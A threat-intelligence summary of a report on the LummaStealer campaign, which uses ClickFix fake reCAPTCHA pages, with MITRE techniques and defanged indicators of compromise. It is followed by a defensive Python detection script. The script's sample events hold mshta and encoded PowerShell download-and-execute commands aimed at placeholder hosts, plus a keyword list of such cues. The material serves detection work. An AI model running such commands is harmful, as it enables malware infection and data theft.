One ClickFix and LummaStealer reCAPTCHA’s Our Attention – Part 1

RevEng.AI has been monitoring LummaStealer, an information-stealing malware campaign that uses ClickFix to trick users into running malicious commands themselves via fake Google reCAPTCHA pages. The report walks through the delivery chain and execution methods in detail, showing how LummaStealer's code changes over time while keeping its data-theft capabilities; the changes are aimed at evading detection mechanisms.
Affected: Computer systems, cybersecurity sector

Key points:

  • LummaStealer is a malware variant focused on stealing sensitive data.
  • It uses ClickFix delivery mechanisms, including fake reCAPTCHA pages, to deceive victims.
  • The malware extracts sensitive data like passwords and cryptocurrency wallets.
  • RevEng.AI documented the malware’s evolution and delivery chain.
  • Multiple execution approaches are employed, such as PowerShell and MSHTA, to run the malicious commands.
  • Detection mechanisms have to adapt to ongoing changes in LummaStealer's code.
  • The successive stages of the attack chain are detailed, showcasing various obfuscation methods.

MITRE Techniques:

  • T1218.005 – System Binary Proxy Execution: MSHTA – Utilizes MSHTA to execute commands loaded through fake reCAPTCHA pages.
  • T1059.001 – Command and Scripting Interpreter: PowerShell – Executes PowerShell commands encoded in malicious scripts to download additional payloads.
  • T1059.007 – Command and Scripting Interpreter: JavaScript – Implements JavaScript within fake pages to execute payloads and collect user data.
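As an added defender-side example (not code from the RevEng.AI report), the following Python rules flag the two execution paths listed above, T1218.005 and T1059.001, over constructed Sysmon-style process-creation events. The explorer.exe parent check is an assumption about Run-dialog launches rather than something the report states, and every URL and path in the sample events is a placeholder.

```python
import base64
import re
# Constructed Sysmon-style process-creation events (not from the report); the encoded
# command is generated here from a harmless placeholder URL.
_ENCODED = base64.b64encode(
    "iex (irm http://example.invalid/stage2)".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://example.invalid/you-have-to-pass-this-step-2.html"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell -w hidden -NoProfile -enc {_ENCODED}"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"parent": "explorer.exe", "image": "mshta.exe", "cmdline": r"mshta C:\Windows\help\legit.hta"},
]

URL_RE = re.compile(r"https?://", re.I)
# -e, -ec, -en, -enc, -encodedcommand: the prefixes powershell.exe resolves to -EncodedCommand
ENC_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+(\S+)", re.I)
DOWNLOAD_CUES = ("http", "iex", "irm", "iwr", "invoke-expression", "invoke-webrequest",
                 "invoke-restmethod", "downloadstring", "net.webclient")

def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return (technique_id, reason) findings for one process-creation event."""
    image, cmd, findings = event["image"].lower(), event["cmdline"], []
    if image == "mshta.exe" and URL_RE.search(cmd):
        findings.append(("T1218.005", "mshta.exe launched with a remote URL"))
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded and any(cue in decoded.lower() for cue in DOWNLOAD_CUES):
            findings.append(("T1059.001", "encoded PowerShell command fetches remote content"))
    # Assumption (not stated in the report): a console tool spawned directly by explorer.exe
    # is consistent with a user pasting a ClickFix command into the Run dialog.
    if findings and event["parent"].lower() == "explorer.exe":
        findings.append(("context", "spawned by explorer.exe (Run-dialog style launch)"))
    return findings

def scan(events):  # event index -> findings, for events that trigger at least one rule
    return {i: f for i, e in enumerate(events) if (f := classify(e))}
```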

Indicators of Compromise:

  • [SHA-256] 179e242265226557187b41ff81b7d4eebbe0d5fe5ff4d6a9cfffe32c83934a46
  • [SHA-256] f8cfc73614c279e143b97a0073048925ce8b224ee7ecc03e396d015151147693
  • [SHA-256] 3739d6cc6eb06121e504eadffecf71568ddcedb98ee6bbbb75bd4b0244b4aec8
  • [Domain] bekind[.]ae
  • [URL] https[:]//googlsearchings[.]online/you-have-to-pass-this-step-2.html

Full Story: https://blog.reveng.ai/one-clickfix-and-lummastealer-recaptchas-our-attention-part-1/